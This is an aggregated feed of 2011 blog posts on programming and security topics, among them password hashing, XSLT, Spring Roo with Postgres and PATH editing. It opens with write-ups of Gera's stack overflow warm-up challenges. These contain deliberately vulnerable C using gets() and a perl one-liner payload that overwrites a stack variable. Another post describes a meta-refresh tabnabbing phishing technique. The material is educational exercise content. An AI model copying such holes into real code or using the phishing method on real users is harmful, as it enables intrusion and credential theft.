int main() {
  int cookie;
  char buf[80];
  printf("buf: %08x cookie: %08x\n", &buf, &cookie);
  gets(buf);
  if (cookie == 0x01020005)
    printf("you win!\n");
}

Not much is new here. We exploit this the same was we did the first two except that we have a null character (ctrl @).

I want to point out one thing that I didn't mention on my previous posts. The address of cookie and buf are printed out so we don't really need to "guess" where they are on the stack. I ignored this before, because in real programs, the address values are rarely printed out.

by Eitan Adler (noreply@blogger.com) at June 25, 2011 04:14 PM

Warming up to the stack #2

#include <stdio.h>
int main() {
  int cookie;
  char buf[80];
  printf("buf: %08x cookie: %08x\n", &buf, &cookie);
  gets(buf);
  if (cookie == 0x01020305)
    printf("you win!\n");
}

Gera's challenge #2 is exactly the same as the first one other than the cookie we need to write. What makes this interesting is that the characters are not "printable" (they don't have a symbolic representation.

There are a few ways to deal with this:
  • Take a file similar the original one and use a hex editor, like hexcurse(1), to manually modify it.
  • Use inline perl. perl -e 'print "q" x 80 . "\x05\x03\x02\x01"'
  • Directly entering the special characters using ctrl+v followed by a ctrl+key. The key is 0x40 + the value. This won't necessarily work on your terminal due to the Ctrl + C
%./a.out <exploit
buf: bfbfe9e8 cookie: bfbfea38
you win!

by Eitan Adler (noreply@blogger.com) at June 25, 2011 04:14 PM

How to safely handle user passwords

When you create a website or other service you take on a responsibility to properly store user's credentials; someone who gets access to a user's account can easily see personal information, potentially even financial information. Even if you think you don't have anything of importance, 73% of users[1] have the same password for everything including online banking accounts.

When dealing with passwords, you should generally assume that the attacker has a copy of your database. Many websites still have SQL injection attacks[2]. Most websites are vulnerable to XSS/CSRF attacks.[3]. For this reason it is a bad idea to store passwords as clear text; instead one should use a hash[4].

Even with properly stored passwords users still insist on choosing low security passwords.[5]. As a result malicious hackers have compiled lists of commonly used passwords. In order to mitigate these brute force attacks a lot of techniques have been developed. For example, some sites require you to enter a CAPTCHA, but most of these could easily be defeated[6]. Another simple technique is to limit login failures (once an incorrect password has been entered don't allow another attempt for X period of time). I prefer an exponential delay where each failed attempt causes the delay the become longer than the previous one. There are other possibilities that could take into account more sophisticated criteria such as the geographical region and time of day.

Although important to know the above solutions won't help in the case the attacker has a copy of the user database. In the past hashing the password was sufficient to prevent an attacker from accessing user accounts. Nowadays computers are fast enough that even though the passwords are hashed, compromise is still possible. This is done by taking the list of commonly used passwords and hashing them to see if any match the database. In order to limit the potential for this attack, a new defense was created called "salting". What this entails is hashing a random value (called a "salt") combined with the password. When the user submits his password the system hashes it combined with the salt and compares the combination to the hash already stored in the database. The security benefit of this is that the attacker needs to calculate the hashes for common passwords for each user.

As technology improved even this became insecure. Nowadays attackers can just hash every conceivable password. Furthermore attackers can work together and using "rainbow tables" which contain pre-computed hashes of millions of passwords and salts. These tables are often generated using distributed computing - so each attacker does not have to develop one on their own. This reduces the amount of security that salts can offer.

Now that salting is not good enough we need to explore other options. The main factor when exploring these options is time; this is because it is impossible to create an uncrackable password. What we do instead is increase the time requirement to discover the passwords so as to discourage the attacker. The issue is that many hash functions were not designed for password security, but rather for speedy verification. Hash functions like sha-256 (despite currently being unbroken) lends itself to quickly hashing lists of passwords. Modern computers can md5-hash every conceivable alphanumeric 7 character password in less than hour[7]. Despite widespread use old hash functions like md5[8] or sha1[9] were recently discovered to be insecure.

Today there is bcrypt [pdf], a special hash function created specifically for password security. Uniquely designed, it is slow, and can keep up with the constantly increasing speeds of computers because it uses a "work factor". Although you might be thinking that this will bog down your server, those that use it don't find this to be an issue. For these reasons I strongly advise the use bcrypt along with the the previously stated techniques such as salting.

2011-6-16: update: At the time I wrote this article I was unaware scrypt, a slower (and therefore better) function to use[10]


[1] http://redtape.msnbc.com/2010/02/for-years-computer-security-experts-have-been-preaching-that-users-should-never-share-the-same-password-across-their-connecte.html
[2] http://www.securecomputing.net.au/News/154187,mass-sql-injection-attacks-still-scaling-up.aspx
[3] http://www.darkreading.com/security/app-security/showArticle.jhtml?articleID=221601529
[4] A hash is a function that takes some input and outputs a (sufficiently) unique output such that the original input can not be recovered. One simplistic (and highly insecure) hash function would be count the number of times specific letters occurs and store that instead. For example "One very bad zany apple" would become "31012000000102110100010021". It is not possible to know whether this hash becomes "One very bad zany apple", "Noe vrey adb nzya pplea", or "Npdyoazaevebrnpyela". A cryptographic hash function is designed so that multiple passwords like this are hard to create.
[5] http://www.imperva.com/docs/WP_Consumer_Password_Worst_Practices.pdf [pdf]
[6] Aska: A viable alternative to CAPTCHA? - Eitan Adler (2008)
[7] http://www.cryptopp.com/benchmarks-amd64.html
[8] http://www.schneier.com/blog/archives/2005/06/more_md5_collis.html
[9] http://www.schneier.com/blog/archives/2005/02/sha1_broken.html
[10]http://www.tarsnap.com/scrypt.html


Edit 2010-3-31: fix footnote numbers; subtle grammar errors fixed.
Edit 2011-2-11: grammar errors fixed - thanks JT.

Edit 2011-6-16: change dates to use ISO format

by Eitan Adler (noreply@blogger.com) at June 25, 2011 04:14 PM

Tabnabbing Without Javascript

    I recently came across a new type of phishing attack called tabnabbing. The attack works by using a client side script to detect when the user is not viewing the page, then changes the page content to a phishing page.

    This method desribed by Aza Raskin could be easily prevented by disabling Javascript. However, it is possible to perform the attack even if Javascript is disabled. Most browsers have the ability to refresh the page using a <meta> refresh tag. The page waits until presumably the user isn't looking at the tab any more, then changes the location of the page to one that resembles the true site (as shown in this proof of concept).

If you got to this post via the POC please note that the POC is not a phishing site and I DO NOT log ANY usernames or passwords.

by Eitan Adler (noreply@blogger.com) at June 25, 2011 04:14 PM

Limited use download links

Recently one of my clients approached me to write for him a download system, this system would limit server access by limestone how many times a download link will work.The normal method of downloading a file is a direct link (example.com/video/file.avi) however there is no way to easily provide decent security using this method.

The system in place at the time did not do much in the way of being a solution. It was just a script that took the file name and recorded when it had been accessed. This method had two flaws. The first was that file structure of the site is visible, while this isn't always an issue my client preferred that it not be. The second issue is that only one person could ever download each file.

What I decided to do was to use a database backed solution. First I created five fields:.il {display:inline;}

  • id (Primary Field)
  • ,
  • filename
  • ,
  • uses_left
  • ,
  • random_number
  • ,
  • file_hash
The admin chooses the file location and maximum number of uses. A random number is created and put in the database along with an automatically created ID. The sha256 hash of the file is also recorded on the server to invalidate links if the file is changed or removed. The system then provides a link that could be used to download the video, the link is comprised of the ID number and a sha256 hash of the id, file name, and random_number. The purpose of the random number is to prevent a brute force attacks, where someone understands the details of the file system layout and can guess the link.

There is an obvious loophole to all of this: just share the video instead of the link. There is no way[1] to prevent people from sharing videos. However this system requires the student to host the file themselves which generally takes more effort than just emailing a link.


[1] http://en.wikipedia.org/wiki/Analog_hole

by Eitan Adler (noreply@blogger.com) at June 25, 2011 04:14 PM

tsocks with svn - failure

tsocks is a program that will "sockify" any application. It does so by watching the application and rewriting any networking requests to go through the socks server you specify in tsocks.conf.

You can either use tsocks by running tsocks command [arguments] or by running tsocks on followed by the commands you want to run. You turn it off by running tsocks off.

I ran into an annoying error when using tsocks to sockify subversion. I got the error
svn: OPTIONS of '...': could not connect to server (...)
It turns out that using "tsocks svn up" failed this way, but if I tried the second possibility (tsocks on; svn up; tsocks off) it works.
I have no clue why this might be.

by Eitan Adler (noreply@blogger.com) at June 25, 2011 04:13 PM

Mercurial Extensions

Mercurial has the ability to load extensions dynamically. All that is required is to modify ~/.hgrc.

In order to add an extension open ~/.hgrc in your preferred text editor. Then look for a line that looks like [extensions]. If you don't find one add it to file. Under this line you can add a large number of extensions. Stock mercurial comes with a number of useful extensions (although none of them are turned on by default).

The following are the ones I found useful.
color  - displays output from some commands in color
fetch - does hg fetch; hg update; hg merge in one command
graphlog - command to view revision graphs from a shell
progress (hgext.progress) - shows progress of some commands

to learn more about extensions type hg help extensions into the command line.

by Eitan Adler (noreply@blogger.com) at June 25, 2011 04:13 PM

Prediction: yahoo won't matter

Within the next 5 years Yahoo!, like AOL will still be around but won't matter at all.

by Eitan Adler (noreply@blogger.com) at June 25, 2011 04:13 PM

The Daily Monthly

From the author of Cognitive Daily we have the The Daily Monthly. Each month a new topic but each day a new post (http://dailymonthly.com/)

by Eitan Adler (noreply@blogger.com) at June 25, 2011 04:13 PM

Cognitive Daily comes to a close

Cognitive Daily, one of the best physcology blogs around, announced they will no longer be posting anything new.
I've been reading Cognitive Daily since I was in high school and I'm very saddened to see it go.

by Eitan Adler (noreply@blogger.com) at June 25, 2011 04:13 PM

Useful google search tip

One way to avoid Google getting "too smart" about your search query is to purposely misspell words. Sometimes I've found more relevant results when I do that. The misspelling has to be close to the original word though.

by Eitan Adler (noreply@blogger.com) at June 25, 2011 04:12 PM

xslt: != vs not()

I made a minor change to my xslt file. I often write "stub questions" in my FAQ to remind myself to answer them. I added a simple attribute to the "item" element

<xs:attribute name="stub" default="false">
<xs:simpleType>
<xs:restriction base="xs:string">
<xs:enumeration value="true"/>
<xs:enumeration value="false"/>
</xs:restriction>
</xs:simpleType>
</xs:attribute>


This creates an optional attribute "stub" that is a string which could either be "true" or "false" and is by default "false".

That wasn't too hard to figure out. The harder part was getting my XSLT file to only display non-stub questions.

My first try was <xsl:if test="@stub != 'false'"> (I used != because of the default).
This however never showed any of my questions. It turns out that != doesn't work when an element doesn't exist. After asking around on IRC <xsl:if test="not(@stub = 'true')"> appears to be the correct way to do things.

by Eitan Adler (noreply@blogger.com) at June 25, 2011 04:07 PM

The Schema file for my FAQ

Here is my .xsd file.

<?xml version="1.0" encoding="UTF-8" ?>

<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">

This is where I define the faq element. This is my "root" element. It has two attributes which I use to store version information (version, and editDate). It contains a series of sections.

<xs:element name="faq">
<xs:complexType>
<xs:sequence>
<xs:element ref="section" maxOccurs="unbounded" />
</xs:sequence>
<xs:attribute name="version" type="xs:string" use="required" />
<xs:attribute name="editDate" type="xs:string" use="required" />
</xs:complexType>
</xs:element>


This where I define the item element (I need to change the item and section definitions)
Each item contains an id, a question, an answer, and possibly multiple "see also" links.

<xs:element name="item">
<xs:complexType>
<xs:sequence>
<xs:element ref="question" maxOccurs="1" />
<xs:element ref="answer" maxOccurs="1" />
<xs:element ref="see" minOccurs="0" />
</xs:sequence>
<xs:attribute name="id" type="xs:ID" use="required" />
</xs:complexType>
</xs:element>

Each section contains multiple items as well as a title.

<xs:element name="section">
<xs:complexType>
<xs:sequence>
<xs:element ref="item" maxOccurs="unbounded" />
</xs:sequence>
<xs:attribute name="title" type="xs:string" use="required" />
</xs:complexType>
</xs:element>

Each question is a plain string of text.
I had to resort to a weird trick for answers (to allow HTML) so I defined them as a mixed type.

<!-- describe things in a section -->
<xs:element name="question" type="xs:string" />

<xs:element name="answer">
<xs:complexType mixed="true" />
</xs:element>

Each see element gets converted to the text "see also ..." with a link to the question. The section id, question id are attributes of the see element.

<xs:element name="see">
<xs:complexType mixed="true">
<xs:attribute name="question" type="xs:NMTOKEN" use="required" />
<xs:attribute name="section" type="xs:NMTOKEN" use="required" />
</xs:complexType>
</xs:element>

</xs:schema>

by Eitan Adler (eitan@eitanadler.com) at June 25, 2011 04:07 PM

XML + XSLT --> HTML

I was (am) putting together a FAQ for my classmates. As I started writing it my first pick of format was synamtically valid HTML. I picked definition lists for the question list. My problem was that I needed to repeat certain information constantly. The "back to top" link, the "see also" link format, and a few other things.

After looking around I decided to write my FAQ in XML and write a simple python program to convert it to HTML. When I converted my entire FAQ to XML (a pain in of itself) I wrote a python program to convert it. I realized though that making a simple change to my XML spec (for example adding a "section" part) would require a reworking of my entire python script.

"Even more research" later I found XSLT. When I read the description (converting from XML to another format) I realized that it is exactly what I need. Anyway my FAQ is now written in a reason format (XML with a tag for each section, item, question, and answer) and is converted to HTML using a simple XSLT file.

I'll try post more about how I got some of the cooler features working soon.

by Eitan Adler (eitan@eitanadler.com) at June 25, 2011 04:07 PM

Justin Dearing

Moving your spring-roo hibernate project from Hypersonic to Postgresql

I’ve always been an ORM hater. However, recently the decision to use ORM on a project I am working on was made for me. So I borrowed a pair of my pro-ORM’s colleague’s moccasins so I could walk a few miles in them.  To throw me further out of my comfort zone, this project is being done in java, a language I am quite rusty in.

The first thing I learned about ORMs is that at least in java, you don’t pick your database right away. You start off using an in-memory database like Hypersonic until your data model is fleshed out a bit. Our project is not quite there yet, but we wanted to get familiar with the procedure for doing that. I made an attempt to use SQL Server Denali CTP1 as our database. However, that was proving difficult and another colleague suggested I use a database that might be more “java friendly.” I decided to go with my first true love Postgres.

Our ORM was hibernate. We were using the SpringSource Tool Suite or STS. This includes the development tool spring roo. Amongst many other things, roo manages your maven dependencies, and configures your hibernate persistance layer. These are the particular tasks I will concentrate on for this howto.

Installing postgres

How to do this on your particular operating system is beyond the scope of this document. I went with postgres 9.1 beta 1 just because. The lastest version of postgres 8 should be fine as well. In the examples below I am assuming your database server is running on localhost, and the user name and password you use to connect to it are both postgres. Never do this on anything besides your local laptop, and don’t even do that on your laptop if your postgres port (5432 TCP) is opened to the world.

Installing the driver

According to a comment on this stackoverflow answer, You have to use the jdbc3 postgres driver and not the jdbc4 version for hibernate to be able to generate the DDL to make the tables. My experiments have confirmed this. To install it, startup the roo shell. The roo shell can either be started from your operating system shell via roo.sh/roo.bat, or from inside the SpringSource IDE, which is a very polished eclipse distro. If you are starting up the roo shell from a terminal or command prompt, first cd to the folder where your project is located. The command to install the postgres jdbc driver is as follows:

roo> dependency add --groupId postgresql --artifactId postgresql --version 9.0-801.jdbc3
Updated ROOT\pom.xml [added dependency postgresql:postgresql:9.0-801.jdbc3]
roo>

This will take care of fetching the dependency and editing the pom.xml for you. If you want to attempt with a different version of the postgres driver, browse the different versions on mvnrepository.

Switching the persistence layer

Persistence layer is hibernate speak for database. This makes sense, because data persists in your database, as opposed to ram, cache, etc which is all meant to be temporary. Switching persistence layers in hibernate requires editing two files, persistence.xml and database.info. Editing these two by hand would violate the don’t repeat yourself rule. Luckily we can edit both with one command in the roo shell.

roo> persistence setup --database POSTGRES --provider HIBERNATE --databaseName myproject --userName postgres --password postgres
Updated ROOT\pom.xml [added dependency postgresql:postgresql:8.4-701.jdbc3]
roo>

One thing to be aware of here. The database name needs to be lower case. If you used uppercase characters, your app will not be able to connect to it.

Your persistance.xml file will now look like this:

And your database.properties will look like this:

One manual step

I have not figured out how to get hibernate to execute CREATE DATABASE if the database does not exist. So connect to postgres, and execute the following:

CREATE DATABASE myproject;

Conclusion

Hopefully, all you will need to do is debug your project as a web applicatin and the tables in your application get built. Happy coding!

by Justin at June 25, 2011 02:00 PM

June 19, 2011

Free Software Round Table

Episode 058: June 18, 2011

Tonight's episode will hosted by: Ilya (dotCOMmie) Sukhanov, Bill Burns, Brian Fix, Justin Seyster, and Jonathan Dahan, and was engineered by Jonathan Dahan. Streamed live at 10:00 PM EDT, and some of the hosts are in the chatroom at irc.freenode.net#fsrt .

The following topics are to be discussed:

  • Oracle and the community: [1] [2]
  • C++: [1]
  • RSA: [1]
  • Chrome vs FF in Ubuntu: [1]
  • Linux + Xen friends at last? [1]
  • MSFT + Nvidia: [1]
  • UN says Internet is human right: [1]
  • Skype reverse engineered: [1]
  • Linux 3.0 [1][2]
  • HTC on bootloaders: [1]
  • Nokia wins "Patent War" with Apple [1]
  • Mongo king of nosql? [1]
  • Software Patent Reform [1]

by ron@vnetworx.net (argee) at June 19, 2011 01:14 AM

June 11, 2011

Justin Dearing

More Windows command line PATH goodness pathed.exe

Readers of this blog probably think I have an obsession with editing my system path. That belief is absolutely correct. I even added a tag on this blog for the articles about path manipulation. I am a command line junkie who is constantly trying out new tools so I have to add them to my path. I’ve written about doing this from powershell here and here, as well as doing it with setx. While these methods are good, I wanted something better. I got better with pathed.exe.

pathed.exe is a program that lets you edit both your user and the system path. It only manipulates the path, not other environmental variables. The reason for this extreme specialization is that pathed is specifically designed for appending to and removing from the path. It treats the path as a semicolon delimited array, which is of course what it is. For example, I just ran it now on my machine as I was writing this article (note: live coding is less embarrassing when you do it on a blog).

If you notice, their happen to be two copies of the path to mercurial on my path. Well lets fix it right now:

Wasn’t that easy?

by Justin at June 11, 2011 11:17 PM

June 05, 2011

Justin Dearing

UnSQL #4 Lessons learned from PHP

Jen McCrown has decreed this UnSQL Friday theme Speaker Lessons Learned. Well what could be more a more UnSQL blog than a PHP talk that I bombed at NYPHP!

So a little back story. One day at work I discovered a problem in PHP, so I filed a bug report. I eventually fixed the bug, and my fix was included in PHP 5.3.3 and 5.2.14. I figured, “Hey this would be a great topic for a  talk!” So I gave a talk at NYPHP about how to file and fix a bug in PHP. It bombed.

It bombed for a few reasons. So let me turn my bad talk into a hopefully good blog post, about things not to do at a user group talk.

Lesson number one is don’t give an advanced talk at a user group. The problem with advanced talks at user groups is that there is one session and one talk at a user group. Not everyone in the audience is capable of digesting a one hour talk on that particular advanced topic. This is not an insult to anyone’s intelligence, most people at a given user group could eventually be made to understand your topic, most probably lack the prerequisite knowledge. My talk would have gone much better at a multi track PHP conference, because I’d only get people  that cared about my topic.

Lesson number two is giving a talk that involves mastery of an “off topic” language or technology at a user group is a bad idea. Note that I say mastery not knowledge or awareness. PHP is written in C. You need to really grok C (read: be able to clean up your pointers) to contribute to PHP. However, most PHP programmers don’t know C. I even stated in my slides “I cannot make you a C programmer in one night.” I really should have known better. To use another example, I’d be very wary about talking about CLR procs at an SQL user group because most DBAs don’t know C#, or another CLR language. You can’t write a useful CLR proc without mastering .NET. Giving a talk on CLR procs to a .NET user group could work because most .NET programmers have a basic understanding of T-SQL. As another example, you can probably give a beginner level powershell talk to a SQL user group. Its pretty easy to get a DBA from never used powershell before to making ADO.NET calls in an hour, especially if you focus on doing it with SQLPSX.

Lesson number three is be careful about a war story inspired talk. You might come off as just ranting, or even worse, like I did. Some people, like Sean McCrown, can rant well. People clamor to hear people like Sean rant. People don’t like to hear me rant. I can’t deliver a rant in a way that makes my audience feel involved like Sean does. I realized this at the time I was preparing for my talk. I said things like “the PHP SOAP module is a pile of crap,” and “the PHP community ignores people who submit actual patches.” However, I tried to do it in a non-ranty Dale Carnigieish way.  However, all that emotion lurked below the surface during the talk. When I rant people normally see an angry little nerd getting caught up in some stupid detail that doesn’t matter. In this case I spent my talk actively avoiding going into rant mode, like your friends puppy fresh from obedience school that fidgets anxiously in front of you at a slight distance, obviously wanting in his cute little puppy heart of hearts to jump on you and give you a proper puppy greeting. Since I lacked the time to emotionally distance myself from the BS I had to go through to get this bug fixed, my audience saw an little nerd that was angry about something. They were kinda confused.  Lessons learned, if you can rant like Sean, rant away. If you rant like me, make sure you can emotionally distance yourself from the topic at hand.

Could I make this talk work if I tried again? Perhaps, but I am not that interested. I gave a non-technical talk on contributing to MongoDB at MongoDC. (This post is now NoSQL as well as UnSQL. Double Rainbow all the way!!) That was well received, but had a small audience, and one of my audience members felt 10gen wasn’t open source enough. So I guess lesson number four is no one wants to hear a talk about how to contribute to an open source project. If they want to contribute, they will.

by Justin at June 05, 2011 10:14 PM